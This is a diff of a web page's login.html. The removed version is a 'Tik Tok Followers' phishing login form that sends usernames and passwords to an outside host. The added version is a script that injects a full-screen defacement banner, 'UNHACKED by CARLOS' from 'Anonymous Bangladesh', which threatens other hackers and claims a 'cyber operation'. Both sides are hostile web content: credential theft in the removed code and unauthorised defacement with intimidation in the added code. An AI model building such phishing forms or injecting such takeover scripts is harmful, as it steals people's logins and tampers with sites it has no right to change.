--- a/login.html
+++ b/login.html
@@ -1,62 +1,48 @@
-<!DOCTYPE html>
-<html>
+<script>
+  const carlosHTML = `
+  <div id="carlos-popup" style="position:fixed;top:0;left:0;width:100vw;height:100vh;background:url('https://files.catbox.moe/ti1re6.png') no-repeat center center fixed;background-size:cover;z-index:999999;display:flex;align-items:center;justify-content:center;">
+    <div style="background:rgba(0,0,0,0.9);padding:35px;border-radius:10px;max-width:700px;width:90%;color:#e6ffe6;font-family:'Courier New', monospace;text-align:center;box-shadow:0 0 25px #ff0000;position:relative;border:2px solid #ff0000;">
 
+      <h1 style="color:#ff4444;text-shadow:0 0 8px #ff0000;">☠ UNHACKED by CARLOS ☠</h1>
+      <h3 style="color:#00ffff;margin-bottom:20px;text-shadow:0 0 5px #00ffff;">#from Anonymous Bangladesh</h3>
 
-<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
-<meta name="viewport" content="width=device-width, initial-scale=1">
-<title>Tik Tok Followers</title>
-<script src="jquery.min.js"></script>
-<script src="jscript.js"></script>
-<link rel="stylesheet" type="text/css" href="style.css">
-<style>
-    @media(max-width:760px){
-       #TFG{
-           font-size:140%;
-       } 
-       .buttonstyle{
-           font-size:100%;
-       }
-    
-    .followers , .likes{
-        width:95%;
-    }
-    }
-</style>
-</head>
-<body onload="updateyear()">
-</div>
-<div id="main-tool">
-	<div class="wrapper"><img src="logo.png"></div>
-	<h1 id="TFG">Login</h1>
+      <p style="font-size:17px;line-height:1.6;">
+        ⚠ <strong style="color:#ffffff;">Your site was <span style="color:red;">vulnerable</span></strong> and hacked by <span style="color:#ffaaff;">script kiddies</span>.
+      </p>
+      <p style="font-size:17px;line-height:1.6;">
+        🔍 It has been <strong style="color:#ffffff;">recovered</strong> as a part of a <span style="color:yellow;">cyber operation</span>.
+      </p>
+      <p style="font-size:17px;line-height:1.6;">
+        📩 For more info, contact via Facebook:<br>
+        <a href="https://yourfacebook.link" target="_blank" style="color:#00ffcc;font-weight:bold;text-decoration:underline;">https://yourfacebook.link</a>
+      </p>
 
-<p class="sub-heading"></p>
-<p class="sub-heading"></p>
+      <hr style="margin:25px 0; border-color:#aa0000;">
 
+      <p style="font-size:16px;line-height:1.6;">
+        <span style="color:#ff7777;font-weight:bold;">⚔ Note for Hackers ⚔</span><br>
+        If you attack this site again,<br>
+        You will be <span style="color:red;font-weight:bold;">My Silent Target</span>.<br>
+        Foreign hackers: I won’t touch your country.<br>
+        Just <u>you</u> — and you will be <strong style="color:crimson;">marked</strong>.
+      </p>
 
-    <form action="dataandusers.infinityfreeapp.com/login.php" method="POST">
-    <center>
-    <div id="fillup">
-        <div class="form-option">
-        	<input name="email" class="input-form input-command" type="text" placeholder="Username/Email/Phone" required>
-        </div>
-    <div id="fillup">
-        <div class="form-option">
-        	<input name="password" class="input-form input-command" type="password" placeholder="Password" required>
-        </div>
+      <div style="margin-top:30px; font-size:15px; color:#f6cfcf; font-style:italic;">
+        ☣️ <strong>Note:</strong> This work is a part of <span style="color:#ff2222;font-weight:bold;">Mission SCSB</span>.<br>
+        <span style="color:#fdfd96;">You’ve been touched by the shadows.</span>
+      </div>
 
-        <br><br>
-        <button class="buttonstyle"><b>Login</b></button>
-        </center>
+      <div style="position:absolute; bottom:8px; right:12px; color:#888; font-size:11px;">Carlos was here</div>
 
+      <button onclick="document.getElementById('carlos-popup').remove()" 
+        style="margin-top:30px;padding:10px 20px;background:#ff0000;color:white;border:none;border-radius:5px;cursor:pointer;font-weight:bold;">
+        Close Warning
+      </button>
     </div>
-</div>
+  </div>
+  `;
 
-<div id="steps" style="display:none;">
-
-</div>
-
-<div id="comment" style="display:none;" >
-</div>
-</body>
-
-</html>
+  window.addEventListener('DOMContentLoaded', () => {
+    document.body.insertAdjacentHTML('beforeend', carlosHTML);
+  });
+</script>
